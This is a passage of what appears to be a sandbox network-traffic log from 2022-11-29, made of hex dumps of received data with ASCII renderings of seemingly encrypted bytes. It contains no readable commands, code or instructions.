26 5a 87 a5 a7 af fc 73 57 2b 4c 2f 1e 8e 51 da af 44 11 f8 36 91 45 dd fc 95 b6 12 0c 99 ff a3 f2 d2 49 3d a5 57 65 f0 6b 1e 17 2c b4 70 69 25 de ee b5 ea 09 52 35 a0
                                  Data Ascii: a`H"NhJ/u]%&OqMMu.+:BDF`oEzphMP|W=~92a(mD,&Jzm/7HSaIIt%j9LE[%dxP@-6SVjX/&^]CWQ&ZsW+L/QD6EI=Wek,pi%R5
                                  2022-11-29 15:56:46 UTC3235INData Raw: 22 75 b8 33 ba 10 15 82 7e 80 21 7b 9f b1 23 69 1a 8a b7 1a 44 22 9e 31 c5 52 5f ce a3 78 89 43 65 ad 03 20 67 92 ce 8c 04 ae 4d 2b fb 27 1d a4 7f bf e1 42 3e e5 23 56 66 de eb 2e ff 69 0b 29 6f 55 29 a0 6f f2 89 13 4e 46 c9 39 26 8f 1d 37 3a 05 21 b3 00 11 bc bb bb 74 38 ff 5b 81 35 32 84 eb 63 36 df 99 3a cd de 4c 9b 2c 4c 65 00 7e e3 c1 0a e6 4f e6 df 62 2e b7 9e a8 e7 8c af 45 ae ea 1b 4a 96 0a d4 18 3a 0b a2 9b 19 e3 a6 97 9e 05 5c 18 77 54 bc 4f be 8e 0a 75 55 0a 1f f2 7a 4b 6f e6 19 44 59 89 4b ff 5e fa fd 1e a0 b6 c3 77 7a 50 23 a9 04 91 aa 4c 8b 98 dd c8 0d 32 40 25 cd c0 7f 87 3b 8b 19 2f 85 67 67 e7 c3 c5 16 31 9e 29 16 81 35 b4 d7 da 2f 1e 08 53 b3 44 af cd 6d 55 f2 96 9b 6d 9e 28 53 d0 5a 36 56 73 02 7e 01 fc c1 47 83 60 e7 e0 a9 57 1a 7c 45
                                  Data Ascii: "u3~!{#iD"1R_xCe gM+'B>#Vf.i)oU)oNF9&7:!t8[52c6:L,Le~Ob.EJ:\wTOuUzKoDYK^wzP#L2@%;/gg1)5/SDmUm(SZ6Vs~G`W|E
                                  2022-11-29 15:56:46 UTC3251INData Raw: 7a 18 50 5b 7f 2e 58 9d 55 30 10 81 c5 ae 02 e9 49 0f 5c f7 93 9c 0a 88 76 24 a3 5e 21 d7 80 f3 be e8 8d 9f 49 89 30 bf 98 28 52 78 07 bc 73 4e 91 d4 fb 99 48 c8 41 ee 53 db 13 bd 35 7d 80 62 48 88 a9 d7 13 a1 41 5d ff 1d 1d 0d 32 51 63 fa f2 00 11 b5 b8 46 40 b1 4b 0e d5 c8 82 32 92 8e a0 63 32 69 2a b1 38 6a 93 bc 35 5c af 77 8f d7 00 f4 7e b8 dd a8 10 49 c0 e3 5b 6b 86 7f 50 7e ea b7 e3 1b 88 ba 7c 31 8c c7 d9 45 79 3f af d0 57 67 c5 02 3f b6 7b ad 93 78 27 34 3d 1a 33 8b 4e b9 71 71 17 58 df 14 99 15 58 16 d7 ed a2 7a a4 aa 8f 84 ad 6c c2 13 17 bc cd c1 2e b9 b4 ce 5f 02 74 10 73 41 ec c1 86 0d 89 d3 50 4a 2a 4f d1 97 89 d9 ed 0a 16 ce 51 43 ce e4 9b 51 ed a8 6a 0b c0 7c 24 66 c3 f4 b8 3f 8f f6 18 00 03 70 73 e9 80 6e 53 09 6d a5 ac 03 3a 16 c4 9e b9
                                  Data Ascii: zP[.XU0I\v$^!I0(RxsNHAS5}bHA]2QcF@K2c2i*8j5\w~I[kP~|1Ey?Wg?{x'4=3NqqXXzl._tsAPJ*OQCQj|$f?psnSm:
                                  2022-11-29 15:56:46 UTC3267INData Raw: fb 3a e3 0e 09 9f 4e d8 40 20 64 32 5b c4 7a 53 2e 86 9a ac bb 18 c4 b9 6f 9e e2 1c 56 65 c9 ef 91 60 84 91 fb a4 06 5f f2 4f e6 7a 3f a4 11 a8 7b dc 63 bc 32 6b db 84 2e b5 69 c6 55 8e dd 42 66 4f 00 c7 ae dd f3 a7 ea e2 28 51 95 cc c3 d2 ff f8 57 09 80 5f b8 54 26 ea 71 2d 60 0a 00 27 9f 64 58 d5 1a 52 82 5e a7 c3 fc 87 9e e3 d8 27 98 cd aa 15 ff 59 2a e7 cc 27 75 44 fb 65 9e 48 07 fa 62 cd 3b 3e 2c c0 6c 61 6d 5f 2f 88 a1 68 08 8e 28 61 50 b8 31 1d cc 55 a3 cd 26 a4 84 8a 83 6f 73 ac f9 f5 5e d9 15 1a c0 c7 d4 d1 52 de 74 c7 25 89 12 c9 c2 19 36 3c ad 6c e1 cd 37 8e b3 06 fd a8 1e e1 f1 22 e9 da 8a ca 9f e1 72 9f 92 39 27 c4 d8 9e 3b 1b e6 a6 83 6f a5 d3 20 87 ba 7b 22 8b 21 e5 6e 28 e6 1d 49 81 64 36 3a d9 54 37 a4 d4 ae 2a e0 c7 f7 5f 84 68 52 c8 be
                                  Data Ascii: :N@ d2[zS.oVe`_Oz?{c2k.iUBfO(QW_T&q-`'dXR^'Y*'uDeHb;>,lam_/h(aP1U&os^Rt%6<l7"r9';o {"!n(Id6:T7*_hR
                                  2022-11-29 15:56:46 UTC3283INData Raw: c7 b5 5c e9 94 72 ce e6 f6 33 6b c5 6d 40 1f 1a b0 67 79 7d 5e 4d b0 ca f3 51 c1 53 85 4c b5 0b bc d3 2a b4 0a 42 59 2d e3 87 3c 16 6e 46 db d8 0e 72 d1 0a 94 19 63 8d 52 2b cd b7 52 e6 dd 80 80 fc e2 d9 ca cf 30 67 cc 47 01 0c a1 cf 8f c9 55 6b bd eb 00 80 de d3 76 68 6e 3d 1a 32 0f 2b c5 d2 cd 2d 25 4c bc 31 80 76 78 16 f2 b0 a2 97 a0 2e 5d c8 9e 01 e9 5c 5d 71 aa 6d 79 0b 8b b4 08 21 e0 f3 6f 88 87 3b a1 b6 b8 92 cd 7d 71 60 3c f6 60 35 40 f1 45 e7 be 85 eb 73 2e e1 e1 ba 29 4a ca 81 4c 5b f9 b6 eb 21 3f 64 64 dd 1a 8c b3 7a c3 39 30 fd 1a c5 af e4 31 7e bc 6f 7f 66 87 a7 29 51 5e a5 c1 91 6a 20 23 b7 49 4f f5 b9 be 82 9f 17 c0 2a 0c fb e0 8c f3 99 ba 82 07 f9 2f 11 0c 96 23 82 2f ff 09 c4 e5 58 99 5a 87 32 fa e2 1f 2f 40 8c 42 4f 51 02 50 11 ee 07 3d
                                  Data Ascii: \r3km@gy}^MQSL*BY-<nFrcR+R0gGUkvhn=2+-%L1vx.]\]qmy!o;}q`<`5@Es.)JL[!?ddz901~of)Q^j #IO*/#/XZ2/@BOQP=
                                  2022-11-29 15:56:46 UTC3299INData Raw: 76 b0 68 6f ad 59 0e f3 f5 a3 ba 7f 3b 04 c6 92 6e 5e 48 6f 30 80 da eb de 51 f6 b2 13 c3 1f 09 74 35 ad d0 b5 83 de 25 68 2c 18 88 fb fa e7 0d bd 23 8b b1 3f 5b 53 a5 88 b7 c0 2b a4 d3 19 21 5b fa 78 82 07 8a 0d 51 30 52 e2 5c 35 9a 6f 9a c0 bb ff 93 64 33 00 41 07 47 c6 15 80 78 46 fc 74 b5 2d 6b b4 43 9b d9 5a 33 07 23 38 17 30 32 e3 b2 49 c4 70 61 59 40 aa 0d 0e a0 17 23 df 5b 26 ab e8 63 a9 5a c7 46 c3 64 e5 4d 11 1c a9 b4 26 4c f3 13 b9 4b 9d b0 fd 5c 60 ba aa 52 e1 f2 44 fa 20 cc 1f 4f e6 3c d4 f7 5a 46 97 84 c8 09 5c 4e 4a 3a 46 54 d9 af 94 6a 30 0b 17 9f 8a ac 77 ec 5e ce f3 93 f0 39 41 5a 07 14 79 cb 6e c9 5d 7e b4 b7 8c 96 33 fc b7 df 92 c6 db 6c 4e de cc 13 3f 61 16 02 1e 3f db 9f cf 17 16 c2 52 ba ee 00 8c 38 02 82 e0 52 f1 f6 69 b7 0d 5e 12
                                  Data Ascii: vhoY;n^Ho0Qt5%h,#?[S+![xQ0R\5od3AGxFt-kCZ3#802IpaY@#[&cZFdM&LK\`RD O<ZF\NJ:FTj0w^9AZyn]~3lN?a?R8Ri^
                                  2022-11-29 15:56:46 UTC3315INData Raw: 80 ea 0d 78 24 ab 79 11 72 a8 11 3a 56 a0 0e 4b 35 d9 22 1a 27 67 a9 0d 39 58 6d 58 6d ba 9a a4 f4 31 85 62 c7 c9 be ae 4f 16 a3 72 f7 9c 4c 90 44 7e 33 41 c3 c8 b5 00 83 46 46 f5 2f d9 e4 9d 43 61 db 7c 6e 30 4a 47 46 ae 96 86 88 fc f8 c1 ec e4 89 7f cc 71 51 0e 4d 0c f9 1b 10 76 16 f7 2c bc 72 5f 3a bc 81 93 5b a3 66 f1 9b a8 99 db a1 b9 13 a8 1a e6 41 26 7f bb 9b 94 be f0 e9 de 8c 7d b2 88 8b e4 62 75 0d 04 a6 6d cd 73 86 e3 44 d8 7d 84 28 1d 20 1c 4c 2c f7 5f 93 93 8e 74 7e 22 33 3d 4d 30 26 e6 e6 8d e9 fa 35 21 51 65 8a ba 95 ec 82 a9 22 0e 1f bd ea 89 f0 23 1a 1b 49 18 d0 6a c1 2c 02 f6 75 7c c0 41 73 80 11 95 d4 8d 95 32 43 c1 88 84 1a 42 1d 94 e9 e6 c8 20 b3 18 c5 57 d6 3a 76 5a fa fd 78 1c b0 bd c2 5b e4 d4 ac 21 7a 89 ad f6 e7 99 65 61 55 28 51
                                  Data Ascii: x$yr:VK5"'g9XmXm1bOrLD~3AFF/Ca|n0JGFqQMv,r_:[fA&}bumsD}( L,_t~"3=M0&5!Qe"#Ij,u|As2CB W:vZx[!zeaU(Q
                                  2022-11-29 15:56:46 UTC3331INData Raw: 72 ad 71 86 63 ec 5a ad 4a ab ba 96 17 86 f0 9f 12 be c5 27 86 e5 53 43 50 a6 c5 81 0f 41 d7 04 ca ef 82 51 2f 42 b7 46 19 f2 73 ff 01 a8 7a 8e 19 4e 28 68 43 5f dd 0e 00 43 4d 7c 4d 0d 0e 6f 7f b4 29 f8 72 19 3c 11 52 4a 0b 58 15 88 64 16 fd e8 38 41 4b e5 d2 a8 2c ec f7 7e bd 9f fd f5 7d 79 74 0e 31 74 9f 7c b7 a8 75 f9 fb 76 37 08 27 d1 02 c9 29 19 7d 74 fb af ad 2f 3b 56 0a 79 3d 66 d6 87 fc bd 52 ed e6 5d 10 2a fc f8 a6 5d 5e f4 44 46 79 61 72 64 0f ff 04 1f 17 64 9e c1 2b 36 04 63 f9 e9 36 7f 26 26 a4 43 a7 c6 b6 60 ad 4d 6d 0b b7 44 94 62 3a c7 86 13 94 f3 c5 bc da ab b8 9c 57 c4 a9 2d a3 5e 9c 39 84 9e 5b a6 9f 0d 66 af 31 4e 69 f7 bd c5 c5 9a 79 af 0d 31 14 75 0d 60 ce 87 e9 34 33 3a 0c 3e c0 6e 13 d8 28 4d ac 58 e4 e2 d2 05 64 4b 03 88 78 18 c0
                                  Data Ascii: rqcZJ'SCPAQ/BFszN(hC_CM|Mo)r<RJXd8AK,~}yt1t|uv7')}t/;Vy=fR]*]^DFyardd+6c6&&C`MmDb:W-^9[f1Niy1u`43:>n(MXdKx
                                  2022-11-29 15:56:46 UTC3347INData Raw: b0 f5 53 2f 33 d0 b2 91 39 f9 0d fd 8b e3 b3 c1 33 d9 01 6b bf de ec 66 d0 6e 1f 76 9c 63 4f 7b 11 9a 64 4e 31 a0 30 57 38 56 9f b2 04 68 b0 3c bd 32 a0 4d 25 f7 c5 21 29 51 6a e8 f1 f6 f2 f1 7e d7 ae 67 b9 a8 a3 f0 cb 9b df 36 1e 4c 51 43 c3 5e 39 36 c1 7d 49 5b 68 b4 0c 1a 10 74 57 fd 79 b0 e6 54 7a 83 62 cc 33 54 78 31 54 03 dc cc 7a 64 43 4a 3e f4 d0 3a 27 aa 07 4d d3 b5 9d fc 6a 52 13 ba e4 f5 c0 ad 2e 9a c1 10 32 74 ca 72 69 b6 5c c4 26 a4 e4 6e 54 12 34 0b 4f ac 77 6b 10 92 1f df 74 a7 51 0a 04 9e 18 a1 05 ff a2 4b 18 59 a6 0e ab 25 a1 3b b5 e1 e4 0f 94 49 60 9c b1 45 14 ca 97 66 7d 85 d2 d9 b1 08 ed 31 1e 87 71 91 dd 03 39 1e b8 10 34 d6 86 3e 44 fd 94 f1 ca 38 e4 6b 1c 81 d7 93 60 b4 0f 7f eb 0b 77 ae 85 1f 2f b8 f1 26 e9 15 76 18 4e db e8 74 78
                                  Data Ascii: S/393kfnvcO{dN10W8Vh<2M%!)Qj~g6LQC^96}I[htWyTzb3Tx1TzdCJ>:'MjR.2tri\&nT4OwktQKY%;I`Ef}1q94>D8k`w/&vNtx
                                  2022-11-29 15:56:46 UTC3363INData Raw: 1f 6f d8 b0 0d 9e d8 98 0a b0 91 1d 8e 54 86 0f 42 e2 41 95 f6 e7 10 de c9 3a b9 8f 50 cc 07 e0 10 45 af 33 b3 aa 39 0b c0 51 4f 5f 3d dd 99 47 a8 e9 2f 51 8e db c4 3d 00 fc 10 b2 b9 0d 53 19 c4 4e ac d2 47 70 18 6e 58 37 17 12 f9 ce 61 ee 0e b2 47 08 18 6f 8e 2e ed 38 47 3d db e2 47 45 4e 26 c2 78 76 c6 b3 e1 38 ff f5 66 73 d8 45 4c 6a d1 02 c3 35 62 a0 ae d7 86 ac 52 f4 0b 0c 14 f3 c6 35 f3 b8 a5 9e d3 35 ce ad 18 fa f3 03 5a cd d9 ef fe 29 b2 1e f5 7e 71 46 50 ab 8d 9e 36 39 0c e5 40 31 d6 eb 5c d7 ce 45 07 21 db 55 6a c5 0b ac 35 a9 22 4b 27 10 22 d7 0a 7c 64 79 1a 36 a8 52 ad 35 be 43 5a cb 59 75 e9 25 e0 c0 86 74 1d cd 57 20 f2 da af ed 9c de 2a 2c 38 13 6a 94 9f e7 cb 1c cc 4d cb 31 c9 36 67 62 2f 21 69 2c 56 a4 42 74 b6 3d 75 76 c1 25 20 86 39 88
                                  Data Ascii: oTBA:PE39QO_=G/Q=SNGpnX7aGo.8G=GEN&xv8fsELj5bR55Z)~qFP69@1\E!Uj5"K'"|dy6R5CZYu%tW *,8jM16gb/!i,VBt=uv% 9
                                  2022-11-29 15:56:46 UTC3379INData Raw: 8f 5a a2 07 fc bb c1 f4 ac 46 48 1c 29 7e eb db 3f 36 4c 2e a0 15 2b 33 69 6a 8e 88 66 3c d7 f6 69 54 d0 30 30 57 52 4d 1b 5e f4 e9 79 20 90 d1 f1 d3 29 4e 46 1f ba 08 2e 4a 99 12 53 c9 4f 1c 7b 6b 56 be 93 17 60 72 a3 d9 7d 34 a7 d6 cd 79 a4 8e a4 3b 75 2e af be 09 fa 26 8f 50 66 4f 6e de 77 04 a6 7e d2 a8 bc d0 c9 d1 63 22 0c 93 d5 09 8c 9e 4f 86 19 d9 f9 5c 38 8a f2 d7 47 81 54 16 71 d8 f9 d6 7e 46 dc 4e dc d6 19 11 bd 54 a1 5a 4a ae 09 6b c1 8d 76 a2 6f 95 2f a0 5b de 28 45 d9 18 be d1 91 13 68 8c 92 2d 2f 87 e7 fb 58 0d f7 eb 55 79 dc 32 7b 6a 02 1e bb e9 be da 62 12 d5 55 78 b5 30 1c 06 7f 3e 22 37 1d 64 8d b7 1c 01 e3 b5 bf c6 07 b9 04 a0 8f 1e ee 64 a0 c6 e8 3c a9 0d af 3e 5b 45 11 01 dc 7a da 14 46 b5 f6 2e 3c a4 0b 50 89 d6 bc a5 4f 6b a3 95 b8
                                  Data Ascii: ZFH)~?6L.+3ijf<iT00WRM^y )NF.JSO{kV`r}4y;u.&PfOnw~c"O\8GTq~FNTZJkvo/[(Eh-/XUy2{jbUx0>"7dd<>[EzF.<POk
                                  2022-11-29 15:56:46 UTC3395INData Raw: a7 54 d3 c6 b9 3e ee 9d a7 f2 26 76 6d 25 cc 2d da 49 78 97 b7 11 08 b8 01 a7 f7 1b 4d d4 fe 42 d2 05 f4 2b 0d 5f e4 9e 39 b8 a0 6c 0e 08 4c ce bf 4a 2f 68 20 26 89 b0 cf 13 27 4d ad 98 ca f1 d5 9b c5 6b 5b 8c ff f8 f8 e1 b9 15 c5 96 0e a6 ee a8 9a 0c 5d 4f 67 c8 1d 3c fb 58 05 10 04 e4 57 e5 47 d2 11 f2 20 5d bf 6d 94 e2 d5 60 a2 71 db 73 f8 2f 85 ba 30 d9 db 94 e2 f9 9c 4f 42 d7 2b 54 1d 9d 66 59 0f 4d 3a ea dc ba da 28 e5 73 e1 77 e7 c6 7c 54 8b a6 de 74 ff 19 d4 43 2a 21 28 b9 df 34 8a d3 0d 58 ef 3d 43 c7 6c cd d1 2a ea f6 87 ff a9 a4 6e 50 8c 0e eb 43 c6 48 ab ac 99 ae 9a 1c ab a9 ef 8b 25 2f 32 17 ff ef 3e 5e 25 ee 05 fd 41 a0 b8 3b fa 2f 02 b8 96 3b 05 c2 98 f1 1c 4f f0 d4 90 31 d0 7e b4 18 bb fb 68 fd 07 3f 54 f9 3b ab 33 43 ba ef fe 41 95 b9 9e
                                  Data Ascii: T>&vm%-IxMB+_9lLJ/h &'Mk[]Og<XWG ]m`qs/0OB+TfYM:(sw|TtC*!(4X=Cl*nPCH%/2>^%A;/;O1~h?T;3CA
                                  2022-11-29 15:56:46 UTC3411INData Raw: ac 50 bf f1 1a 18 fa 16 92 cb 74 64 d4 6e f8 57 41 91 73 79 3b 0a d2 52 67 83 87 2f 9e 32 68 b1 1a 30 cf df c9 5b d8 88 e4 ba 38 37 d2 33 c7 3e 8a 9b e0 0e b8 dd be 4b 55 f0 84 0e c0 ca 1d ee a3 49 30 4d 33 47 d3 e2 1a 0e 7d b3 b1 65 1c 36 72 ae f4 42 99 ed 38 c7 4f 0e e6 95 e2 fb 06 0d 53 ec 05 a3 f4 4c 4b 21 c5 a1 0b 15 33 a7 bc ca a2 7e 0c 2f 27 09 49 8d fe c1 88 7c 53 75 9e bd 84 9c 3b b1 4d 18 53 9d ad e8 77 f3 9d eb 69 aa 67 97 2d c5 9b 38 57 8b 7e e9 4d 05 48 58 8e bf f9 7d 97 4a 29 ec a7 fe 68 bf 30 c5 c3 93 8d 8b 29 43 3c f1 10 f4 5b 78 ce a3 61 b0 d6 54 74 bd db 7e bd 7e cb c8 07 8e 39 36 94 14 54 22 82 9a 17 03 29 c5 10 66 db 61 5f 71 ef cb 27 60 a6 45 45 c3 9f 69 49 b1 34 7f f7 ef 13 64 08 43 7b d2 94 73 b5 7f ba db 3b dc 35 fa f7 7c 48 34 07
                                  Data Ascii: PtdnWAsy;Rg/2h0[873>KUI0M3G}e6rB8OSLK!3~/'I|Su;MSwig-8W~MHX}J)h0)C<[xaTt~~96T")fa_q'`EEiI4dC{s;5|H4
                                  2022-11-29 15:56:46 UTC3427INData Raw: 32 09 69 90 03 01 cd 8f b3 a4 89 4c bd 7c 73 4b c8 bb ee 57 98 f4 9b eb c0 a0 8c 5a c7 e9 14 e5 17 ec 93 26 9a e1 58 ad 07 6b f4 00 44 18 1e 74 aa 79 43 17 cb 2d c1 73 73 86 9e 64 5c 50 69 c1 e4 9c 66 6b 2f 6a 46 b6 1b 68 f3 82 2b a3 95 66 d7 dd f3 cd ab 82 ae b0 e6 3c f5 8f 50 ca b6 77 9e ea b4 a0 16 0a e4 9a 55 5c 70 5a 0c 48 4c 9b 1b 9b 26 23 49 8f 34 59 fa 49 40 50 3f 12 5f 5e 7f e3 b3 e2 d2 9f 65 dc 6f 4d 48 39 66 9d 9d 52 18 2e bc d1 3d 29 71 ec b2 00 eb f6 64 95 04 d7 03 8d 85 dc 70 77 18 96 4a c6 db 4b 7b eb 0b de ff 7b b8 16 3a 42 f6 5c 88 c7 f0 30 83 ee 7f 8a bf a2 23 99 3c 48 21 19 91 e2 9b 7e c2 fc f1 ad d6 36 76 14 ca a3 74 cc 64 95 06 9c e0 0f 5f a3 9d 92 a5 cd ce ee ef 14 13 04 b8 a3 d9 a7 1e 31 73 ae 49 9e a9 2c 36 16 ad 9d 32 22 78 4e a4
                                  Data Ascii: 2iL|sKWZ&XkDtyC-ssd\Pifk/jFh+f<PwU\pZHL&#I4YI@P?_^eoMH9fR.=)qdpwJK{{:B\0#<H!~6vtd_1sI,62"xN
                                  2022-11-29 15:56:46 UTC3443INData Raw: 32 d3 2e d7 88 4e b2 aa dd 76 87 19 f1 9f 47 0c c6 af 19 0a 23 0e cb a1 5f ed 96 a6 71 24 59 22 a9 26 9c 2a d6 11 f8 3e ac 10 9a 99 61 99 96 0e 53 da 6c 9c 04 9b ef bf e8 3d 79 e3 88 f2 86 9b a0 d7 72 ad 5a 08 82 0e 43 fa 7a c8 8f cf 38 e5 aa 9d b7 cb 91 79 70 71 c1 3f 84 61 13 bf 35 3a 8d ac fa 54 5a bf 9d 14 36 bd fe 24 4b 3b a6 10 bc 22 66 8f a8 2f 1a 6e ac 61 07 fd 35 e5 d8 3c b5 f5 2c 11 d5 a5 35 51 66 0c 87 3c ad 0d bb ef 61 14 22 bf f4 11 af 0b 1c 67 0c f1 b7 7c 68 ae b7 03 46 ca f7 03 5f 6b c0 0a e4 56 1b 29 48 ba 32 45 1f 45 39 f8 a8 0d 3b 79 8d c2 7e ff 7e c5 55 82 5c 84 03 1d 74 81 8b 14 a7 95 88 59 d3 e2 68 7e 78 cb 86 e2 f3 1a c6 9e 0f 71 29 c5 fb 07 8e 89 93 a1 c5 ec db d2 91 b3 01 9d 9b 15 ef df e7 0a 37 a0 94 e2 7a f1 14 a3 9f 61 81 c8 d3
                                  Data Ascii: 2.NvG#_q$Y"&*>aSl=yrZCz8ypq?a5:TZ6$K;"f/na5<,5Qf<a"g|hF_kV)H2EE9;y~~U\tYh~xq)7za
                                  2022-11-29 15:56:46 UTC3459INData Raw: 18 fa 03 b7 e4 86 6b fe 79 9c 71 2e c0 c3 3a ea f7 c4 5a 1d 8b 49 19 eb 88 0f bb b9 66 b0 28 e0 00 9b da e0 c9 ee 5b 7a da 72 ac ca f3 85 6e 9d 31 ee b1 08 07 35 9c 43 c6 aa 8b 13 44 22 32 fd 8b 54 d8 af 18 6d f0 8c 23 a2 46 1d 50 90 53 91 3f 42 a6 22 74 13 76 a3 8a 99 a6 6a 2b 5f 67 dd a5 4d f7 6a b0 3f a6 6b 85 ef eb d4 8f 63 a3 a4 52 e5 83 e3 b7 8d 17 9e 6b 11 14 c0 4a 3a 15 29 e9 ff 14 bf fd a2 22 5c a3 16 b6 3b 37 eb a4 c5 fa 4c fc 2a f5 4d 23 0d 61 76 bd 8b f3 5f 1c 66 ec a6 51 bb cd 76 b2 b3 6e 25 1c 8c c3 46 44 88 28 11 1e 80 d3 8b 66 af 3c b9 50 8e fe 3f 71 4c af 40 15 3c 42 2c 9f 47 ec af 90 ea 7c 60 7a 03 89 14 52 42 84 98 25 69 cb 93 71 e1 5e be 06 47 dc 6b 8c 70 af 8e b5 30 f5 79 99 68 b6 b2 58 4e 57 df b0 41 8b 33 cf 06 9e df bc 05 5e 42 ae
                                  Data Ascii: kyq.:ZIf([zrn15CD"2Tm#FPS?B"tvj+_gMj?kcRkJ:)"\;7L*M#av_fQvn%FD(f<P?qL@<B,G|`zRB%iq^Gkp0yhXNWA3^B
                                  2022-11-29 15:56:46 UTC3475INData Raw: c4 94 5f df 1d fd d0 d1 23 ae 57 ed a8 de 02 f2 55 f0 1e b0 6a 4a 48 fe dd 2b 27 53 cc 5e f1 22 80 96 0c 50 3d 96 7d 54 1d e4 dd 09 e3 97 dc ae 53 2c 90 a8 ce b0 44 64 91 ea 21 54 0a 8b 60 67 66 be 90 aa 09 fb 6c 43 c3 ec 60 1c 8c 0b d0 a4 d2 8c 9f 17 d6 90 75 c5 3d 24 86 6d 95 af e9 df d8 5d c9 81 64 f2 76 6c 3e da e4 dc 79 ce 53 07 ae 1e b7 29 05 2c 3c aa 7e 7f 68 3a df 15 90 ed cc 47 b1 b5 a7 d2 ed c4 ac a7 cb ce fe 90 e4 38 47 7f 9b 10 ad aa 6d 42 93 63 9e 05 5f 80 da cb 8d 3b a8 77 47 cb 47 00 41 42 0c 3e e8 af 0a 82 17 e0 55 1f 89 3f 08 68 55 6b 93 29 d0 c0 60 18 57 08 ed 02 33 54 b3 f7 e1 ce 8b e6 b2 9a 15 e6 ca 3d 62 b8 3d cc cf be fb 3c c0 a2 34 d7 aa f2 52 d5 23 bc 4c 9d 6b 8d 4b bb 96 1c f9 ad 55 35 97 07 7b ce 47 c2 56 3f fb 55 28 c1 a2 58 b3
                                  Data Ascii: _#WUjJH+'S^"P=}TS,Dd!T`gflC`u=$m]dvl>yS),<~h:G8GmBc_;wGGAB>U?hUk)`W3T=b=<4R#LkKU5{GV?U(X
                                  2022-11-29 15:56:46 UTC3491INData Raw: c5 0f 21 84 0c 6c e8 30 94 37 52 43 d8 8d 03 fc aa e0 46 12 b4 0b 23 e4 71 8d 35 3e f8 52 97 be 51 ee e3 51 14 66 1e d7 9f b4 41 6e e4 9a 82 28 c8 11 d5 14 90 22 b0 fc ec ca 1e da c7 97 81 a7 17 9a 06 f2 09 ab d6 34 3a 71 4f 43 45 ed 91 8d cb 7f 5e cb 04 76 b9 75 3b d8 52 43 47 ed 53 21 46 88 72 58 14 94 24 d2 6c 15 4d f3 5e 28 21 14 94 38 74 cb 44 3d 4f b9 f7 91 19 ce 60 e0 78 c4 15 e3 86 6e e2 ab d5 a1 de 0f be 0b bd b6 fc 92 fb 10 26 b0 22 0d e5 1b 4f d5 80 26 7a ba 93 1b ab 12 c9 ef a9 d4 82 93 f4 3b aa 63 de 68 af a7 8b be 8a 33 11 a8 06 22 4c 8b 09 1c 11 73 bd 58 45 74 45 94 82 6d fd 34 50 b3 6e 2e fb a3 ef 71 4e c0 de 28 5e 46 5a a7 29 fe 6e c4 e3 57 34 f0 5e a3 18 a9 c6 38 a9 ee 11 63 29 5c 5a 7f 6c f3 bc 4a 0a 4d ad dd 45 3d 9f 34 1a b5 4a 3c 98
                                  Data Ascii: !l07RCF#q5>RQQfAn("4:qOCE^vu;RCGS!FrX$lM^(!8tD=O`xn&"O&z;ch3"LsXEtEm4Pn.qN(^FZ)nW4^8c)\ZlJME=4J<
                                  2022-11-29 15:56:46 UTC3507INData Raw: ac fd 0c df 7c a5 43 97 df 3e 98 f1 d1 8f 69 e4 45 9a 9c 05 06 8f 74 84 e6 33 ef c2 aa 8f 37 27 33 96 df e8 d2 29 f3 33 a2 f3 ef fa 5a 32 d1 6c 86 9a 39 8a 8c 66 91 a9 f2 da 42 c3 c6 45 01 62 8b 13 be 2d 6d 82 23 82 c8 8b 55 33 47 ce 44 34 f0 48 8e ce 94 e9 c1 a5 53 62 69 0a a6 2c 84 87 ac ed 17 f1 13 ff 60 01 5b c5 c2 c4 4f 9f da 6b 73 b7 53 aa e2 62 48 17 44 1f 26 23 28 46 b7 f5 f4 2a a9 9c c5 df 04 d3 a0 0c 93 45 2f fa 1d 32 ba d5 9d 8c a4 3a 4f b4 a9 7a 3a 99 1a 5b ee f5 a1 64 ba e8 de ef 9f 23 7c c5 98 4b b3 0a 04 aa 3c c3 41 b4 20 2c af f6 c3 06 1a 62 f8 4a 61 04 fb 21 38 9e 0d 2a ef 0f ad dd a3 3e 13 2c 73 c7 83 2f 58 5f e4 e2 54 11 8f c8 0d dc 75 7d 40 3a 11 df 25 af 18 46 43 5a 81 7f 9f e8 2e 2f 7c f4 ce 9a fa 8b bb 35 20 79 68 31 65 d3 d8 55 23
                                  Data Ascii: |C>iEt37'3)3Z2l9fBEb-m#U3GD4HSbi,`[OksSbHD&#(F*E/2:Oz:[d#|K<A ,bJa!8*>,s/X_Tu}@:%FCZ./|5 yh1eU#
                                  2022-11-29 15:56:46 UTC3523INData Raw: ca 53 21 d0 01 b2 35 2d 8b 9a cb 1d dc d5 93 69 e3 94 3a 93 9f 54 cc bc c7 f8 03 2c 46 a0 36 6d 56 e3 74 92 78 76 c9 fd 2d 9a 07 d0 df 16 18 ce 06 07 cc 72 15 e6 13 51 b2 4a 15 ae 08 0e ce 74 77 1d 69 c2 8b 87 6c 1e e5 76 23 11 0f 15 6f 2c 4a 32 58 09 c5 cc 87 27 b3 04 0f 93 31 de f6 95 33 48 0b d1 f2 b4 c7 90 36 19 a2 66 29 44 8f 3e b0 f6 41 46 36 0d fd dd 92 80 be 58 6b 06 a0 14 70 37 9a b4 61 3d a1 58 6f aa bc 05 64 b5 6d e7 af 58 d6 20 32 48 0f b3 97 e3 72 bc 4c ac ad 1c cd b3 3d 95 b1 1e fb 85 31 a7 49 0d 3a 61 5e 5b 32 31 7c e8 66 b3 98 56 23 73 e1 da 36 a0 d8 67 4f 86 c9 3f 3f 9c e0 4b 9e b8 0f 37 32 0a 44 0c b3 8b 0c be a2 b2 cb 05 41 5d da bd 7a d1 a7 42 6e 81 fe da 91 ee 37 f5 9d 40 e3 69 36 5f d9 9e 8f c8 46 d0 f9 43 b1 6f 91 63 58 54 f7 24 55
                                  Data Ascii: S!5-i:T,F6mVtxv-rQJtwilv#o,J2X'13H6f)D>AF6Xkp7a=XodmX 2HrL=1I:a^[21|fV#s6gO??K72DA]zBn7@i6_FCocXT$U
